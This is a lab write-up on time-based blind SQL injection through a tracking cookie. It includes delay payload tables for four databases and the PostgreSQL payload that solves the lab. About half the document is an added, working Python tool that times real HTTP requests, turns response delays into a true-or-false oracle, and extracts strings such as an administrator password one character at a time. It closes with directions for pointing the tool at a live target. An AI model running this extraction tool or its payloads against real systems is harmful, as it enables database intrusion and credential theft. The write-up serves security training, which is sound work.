Problem Statement:
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.
To solve this lab we will be using time delays.
You can cause a time delay in the database when the query is processed. Each of the following causes an unconditional time delay of 10 seconds (which one works tells you which database is behind the application):

| Database   | Unconditional 10 second delay            |
|------------|------------------------------------------|
| Oracle     | dbms_pipe.receive_message(('a'),10)      |
| Microsoft  | WAITFOR DELAY '0:0:10'                   |
| PostgreSQL | SELECT pg_sleep(10)                      |
| MySQL      | SELECT SLEEP(10)                         |
Conditional time delays
You can test a single boolean condition and trigger a time delay only if the condition is true. Whether the response is slow or fast then tells you whether the condition held, one bit per request:

| Database   | Conditional 10 second delay                                                                                      |
|------------|------------------------------------------------------------------------------------------------------------------|
| Oracle     | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'\|\|dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual |
| Microsoft  | IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'                                                                  |
| PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END                                   |
| MySQL      | SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')                                                                     |
The solution is simple in this case, because all the lab asks for is the time delay itself; no data has to be extracted.
As discussed above, try each of the payloads (Oracle, Microsoft, PostgreSQL, MySQL) in turn, since we do not know which database the site is using. Only the syntax that matches the backend will produce the delay; the others fail silently because errors are not shown.
Let's see the steps.
- The response never changes and no error is shown, so content-based inference is impossible. The only signal we have is how long the server takes to answer, and the time delay technique turns that into a yes/no oracle.
The first example is against a MySQL database. When the injected condition is true, i.e. it matches a value held in the database, the delay branch is taken: the query blocks for the number of seconds we specified and only completes after that, so the HTTP response arrives late. When the condition is false, the query returns at normal speed.
In this example I am testing for the first name 'vicky'; because that condition is true, the query waits for 10 seconds before it completes.
Similarly, the lab itself turned out to be running PostgreSQL:
Note: the two pipes (||) are the string concatenation operator in PostgreSQL (Oracle uses it too). MySQL uses CONCAT() instead (|| only concatenates there when the PIPES_AS_CONCAT SQL mode is set), and Microsoft SQL Server uses +; it has nothing to do with UNION, which combines result sets.
Because pg_sleep(10) is concatenated into the WHERE clause, it is evaluated as part of the query, and the query, and therefore the HTTP response, cannot complete until the sleep returns. That is exactly the synchronous behaviour the problem statement relies on.
Query (sent as the TrackingId cookie value): x'||pg_sleep(10)--
The single quote closes the string literal the application built around the cookie value, || appends the result of pg_sleep(10) to it, and -- comments out the closing quote the application appends. If the response takes roughly 10 seconds instead of a few hundred milliseconds, the injection worked and the lab is solved.
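The whole technique, as an added example that is not part of the original write-up or of the lab: a small Python helper that builds the conditional-delay payloads quoted above for each database, times a request, and turns "slow or fast" into a yes/no oracle. It goes beyond what this lab asks for and shows how the same oracle recovers a string one character at a time by binary search over its ASCII code. The HTTP sender, the cookie name TrackingId, the assumed 0.2 s baseline round trip, the secret "s3cr3t" and the FakePostgresLab stand-in (which reports the time a real server would take without sleeping, so the script runs offline) are all constructed for this example.

```python
"""Time-based blind SQL injection helper (added example, not the lab's or the author's code).

Assumed injection context, as described in the problem statement:
    SELECT ... WHERE id = '<TrackingId cookie value>'
The response body never changes, so response time is the only channel back.
"""
import re
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

DELAY = 10       # seconds, the delay the lab asks for
BASELINE = 0.2   # assumed normal round-trip time; measure it against a real target

Send = Callable[[str], float]   # cookie value -> elapsed seconds


def lab_payload(seconds: int = DELAY) -> str:
    """Unconditional PostgreSQL delay: the payload that solves the lab."""
    return f"x'||pg_sleep({seconds})--"


def payload(dbms: str, cond: str, seconds: int = DELAY) -> str:
    """Cookie value that makes the backend wait `seconds` only if `cond` is true.
    The conditional forms are the cheat-sheet entries quoted on the page; the
    leading x' closes the original string literal and -- comments out the
    quote the application appends after the cookie value."""
    if dbms == "postgresql":
        return f"x'||(SELECT CASE WHEN ({cond}) THEN pg_sleep({seconds}) ELSE pg_sleep(0) END)--"
    if dbms == "mysql":
        return f"x' AND IF(({cond}),SLEEP({seconds}),0)-- -"      # MySQL needs a space after --
    if dbms == "mssql":
        return f"x'; IF ({cond}) WAITFOR DELAY '0:0:{seconds}'--"
    if dbms == "oracle":
        return (f"x'||(SELECT CASE WHEN ({cond}) THEN 'a'||dbms_pipe.receive_message(('a'),{seconds}) "
                f"ELSE NULL END FROM dual)--")
    raise ValueError(f"unknown dbms {dbms!r}")


def is_delayed(elapsed: float, seconds: int = DELAY, baseline: float = BASELINE) -> bool:
    """Did the injected sleep fire? The threshold sits halfway between the baseline
    and baseline+delay so a few hundred ms of network jitter cannot flip the verdict."""
    return elapsed - baseline > seconds / 2


def http_sender(url: str, cookie_name: str = "TrackingId") -> Send:
    """Real transport (assumed target, not exercised offline): send the cookie, time the round trip."""
    def send(cookie_value: str) -> float:
        # The lab percent-decodes cookie values; drop quote() if the target does not.
        cookie = f"{cookie_name}={urllib.parse.quote(cookie_value, safe='')}"
        req = urllib.request.Request(url, headers={"Cookie": cookie})
        start = time.perf_counter()
        try:
            urllib.request.urlopen(req, timeout=DELAY * 3).read()
        except urllib.error.HTTPError:
            pass                                 # status code is irrelevant, only timing matters
        return time.perf_counter() - start
    return send


def oracle(send: Send, dbms: str, cond: str) -> bool:
    """One timed request = one boolean answer about the database."""
    return is_delayed(send(payload(dbms, cond)))


def extract(send: Send, dbms: str, expr: str, max_len: int = 32) -> str:
    """Recover the string value of `expr` by binary search over each character's
    ASCII code: 7 timed requests per character instead of one per candidate.
    (Oracle spells SUBSTRING as SUBSTR; adjust the condition for that backend.)"""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                           # invariant: code of this char is in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(send, dbms, f"ASCII(SUBSTRING(({expr}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                              # SUBSTRING past the end is '' and ASCII('') is 0
            break
        out += chr(lo)
    return out


class FakePostgresLab:
    """Constructed offline stand-in for the lab: understands only the payloads this
    script emits, evaluates them against a made-up secret, and returns the time a
    real server would have taken without actually sleeping."""
    _cond = re.compile(r"ASCII\(SUBSTRING\(\((.*?)\),(\d+),1\)\)>(\d+)\) THEN pg_sleep\((\d+)\)")
    _plain = re.compile(r"x'\|\|pg_sleep\((\d+)\)--")

    def __init__(self, secret: str):
        self.secret = secret
        self.requests = 0

    def send(self, cookie_value: str) -> float:
        self.requests += 1
        m = self._cond.search(cookie_value)
        if m:
            pos, threshold, secs = int(m.group(2)), int(m.group(3)), int(m.group(4))
            code = ord(self.secret[pos - 1]) if pos <= len(self.secret) else 0
            return BASELINE + (secs if code > threshold else 0)
        m = self._plain.fullmatch(cookie_value)
        return BASELINE + (int(m.group(1)) if m else 0)


def demo() -> tuple:
    """Solve the lab against the fake, then extract a constructed password."""
    target = FakePostgresLab("s3cr3t")          # constructed secret, not lab data
    solved = is_delayed(target.send(lab_payload()))
    password = extract(target.send, "postgresql",
                       "SELECT password FROM users WHERE username='administrator'")
    return solved, password, target.requests     # -> (True, 's3cr3t', 50)


if __name__ == "__main__":
    print(demo())
```

Against a live target replace target.send with http_sender("https://<lab-host>/"); the first thing to do there is measure BASELINE with a harmless cookie value several times, because the halfway threshold in is_delayed is only as good as that estimate.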